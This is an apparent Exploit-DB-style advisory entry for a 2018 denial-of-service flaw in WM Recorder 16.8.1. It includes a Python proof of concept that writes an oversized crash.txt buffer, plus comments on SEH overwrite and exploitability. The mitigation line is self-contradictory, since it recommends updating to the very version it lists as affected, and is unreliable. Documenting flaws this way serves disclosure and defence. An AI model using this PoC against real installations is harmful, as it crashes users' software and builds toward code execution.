Vendor: WM Recorder 16.8.1
By: bzyo
CVSS: 7.8 HIGH
Denial of Service
CWE: N/A
Product Name: WM Recorder 16.8.1
Affected Version From: 16.8.1
Affected Version To: 16.8.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wm_recorder:wm_recorder:16.8.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x86/x64, Windows 10 x64
2018

WM Recorder 16.8.1 – Denial of Service

WM Recorder 16.8.1 is vulnerable to a denial of service attack. An attacker can generate a crash.txt file containing a buffer of 429 A characters, 4 B characters, 4 C characters, and 9562 D characters. The attacker then opens the application, goes to Schedule Recordings, opens the Scheduler, pastes the contents of crash.txt into the Stream URL, File name and Website URL fields, changes the End Recording date to a future date, turns the scheduler on, and selects OK. The application then crashes and the EIP register is overwritten.

Mitigation:

Update to the latest version of WM Recorder 16.8.1

Exploit-DB raw data:

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: WM Recorder 16.8.1 - Denial of Service
# Date: 03-20-2018
# Vulnerable Software: WM Recorder 16.8.1
# Vendor Homepage: http://wmrecorder.com/home/
# Version: 16.8.1
# Software Link: http://wmrecorder.com/download/wm-recorder/
# Tested On: Windows 7 x86/x64, Windows 10 x64
#
#
# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,
# change End Recording date to future date, turn scheduler on, select OK
#
# app crashes & EIP overwrite;
# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh
# lots of bad chars including \x90
#

filename = "crash.txt"

junk = "\x41"*429
nseh = "\x42"*4
seh = "\x43"*4
fill = "\x44"*9562

buffer = junk + nseh + seh + fill

with open(filename, 'w') as textfile:
    textfile.write(buffer)